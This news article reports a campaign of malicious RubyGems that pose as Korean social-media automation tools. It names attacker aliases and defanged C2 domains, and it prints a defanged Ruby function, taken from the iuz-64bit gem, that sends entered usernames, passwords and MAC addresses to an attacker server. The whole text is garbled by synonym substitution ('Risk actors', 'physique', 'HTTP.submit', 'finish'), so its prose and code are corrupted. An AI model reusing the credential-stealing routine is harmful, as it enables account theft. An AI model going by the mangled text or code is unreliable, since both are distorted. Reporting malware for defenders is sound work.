Risk actors started slipping malicious code into official RubyGems packages, disguising infostealers as social media automation instruments in early 2023.
Over the previous two years, attackers working underneath aliases reminiscent of zon, nowon, kwonsoonje, and soonje have printed greater than 60 gems that ship promised automation options—bulk posting, engagement amplification, and backlink creation—whereas covertly harvesting credentials.
These packages goal platforms together with Instagram, Twitter/X, TikTok, WordPress, Telegram, Kakao, and Naver, and have been downloaded over 275,000 instances, with installs persisting on machines lengthy after particular person gems are faraway from the general public index.
Socket.dev analysts famous that every malicious gem incorporates a light-weight graphical interface constructed with Glimmer-DSL-LibUI, introduced in Korean to enchantment to South Korean grey-hat entrepreneurs.
Upon launch, customers encounter prompts labeled “아이디” (ID) and “비밀번호” (password), encouraging entry of account credentials underneath the guise of official login for automation companies.
As a substitute of forwarding these particulars to official APIs, the gems instantly exfiltrate credentials and host MAC addresses to attacker-controlled servers by way of HTTP POST requests.
The domains programzon[.]com, appspace[.]kr, marketingduo[.]co[.]kr, and seven1.iwinv[.]web host PHP bulletin board endpoints that silently settle for stolen knowledge.
The marketing campaign’s evolution demonstrates a classy provide chain compromise. Gems printed underneath the zon alias are sometimes “yanked”—faraway from RubyGems—inside days, solely to be mirrored in steady integration caches and redistributed underneath new names by the identical actor.
Screenshot from marketingduo[.]co[.]kr displaying Korean-language interface for bulk messaging instruments (Supply – Socket.dev)
Regardless of periodic infrastructure shifts, the core credential-stealing routine stays unchanged, enabling persistent fingerprinting of contaminated hosts.
This method leverages grey-hat entrepreneurs’ reliance on disposable accounts; victims not often report breaches, opting as an alternative to desert compromised identities and proceed operations with out suspicion.
An infection Mechanism and Exfiltration Workflow
The malicious iuz-64bit gem exemplifies the an infection mechanism shared throughout the cluster.
After presenting its GUI, the gem invokes a perform that collects consumer enter and system identifiers earlier than performing an HTTP POST to the attacker’s C2 endpoint.
The defanged Ruby snippet beneath illustrates the method:-
def login_check2(user_id, user_pw)
url=” # C2 endpoint
headers = { ‘Content material-Sort’ => ‘utility/json’ }
mac = get_mac_address()
physique = {
username: user_id,
password: user_pw,
macAddress: mac,
program: ‘인스타 자동 포스팅(업로드) 프로그램’
}.to_json
response = HTTP.submit(url, headers: headers, physique: physique)
payload = JSON.parse(response.physique.to_s)
payload[‘status’] == “0” ? “0” : payload[‘message’]
finish
Annotated code snippet from iuz-64bit gem illustrating credential exfiltration (Supply – Socket.dev)
As soon as credentials and MAC addresses attain the C2 server, the attacker can correlate installations throughout varied gem clusters, monitor device distribution, and preserve long-term entry.
This dual-use mannequin empowers grey-hat entrepreneurs to automate spam and search engine marketing campaigns whereas surreptitiously funneling delicate knowledge to the menace actor.
Because the marketing campaign persists, defenders should combine real-time dependency scanning and install-time alerts to detect and block these malicious packages earlier than they infiltrate growth environments.
Equip your SOC with full entry to the newest menace knowledge from ANY.RUN TI Lookup that may Enhance incident response -> Get 14-day Free Trial
